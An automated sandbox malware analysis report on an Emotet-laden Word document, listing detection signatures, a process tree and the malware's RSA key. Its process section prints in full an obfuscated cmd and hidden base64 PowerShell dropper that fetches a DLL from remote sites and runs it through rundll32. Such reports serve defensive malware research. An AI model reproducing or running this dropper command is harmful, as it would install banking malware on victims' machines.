Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report N00048481397007.doc

Overview

General Information

Sample Name:N00048481397007.doc
Analysis ID:344134
MD5:ad7db0f946bc5c3bb051cb04f359e6a4
SHA1:24d54a6a1c4280b948fb245c97e4823d319eefe1
SHA256:4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1144 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2372 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2532 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2584 cmdline: powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2712 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2688 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2692 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 260 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',JnNGuImBTNGmQ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2468 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2428 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2512 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2416 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2832 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 3040 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 2260 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 2240 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                • rundll32.exe (PID: 1068 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                  • rundll32.exe (PID: 1836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                    • rundll32.exe (PID: 1360 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    0000000F.00000002.2106050192.0000000000310000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 37 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            17.2.rundll32.exe.370000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              13.2.rundll32.exe.410000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                15.2.rundll32.exe.310000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  12.2.rundll32.exe.400000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    10.2.rundll32.exe.5d0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 51 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2688, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1, ProcessId: 2692
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc 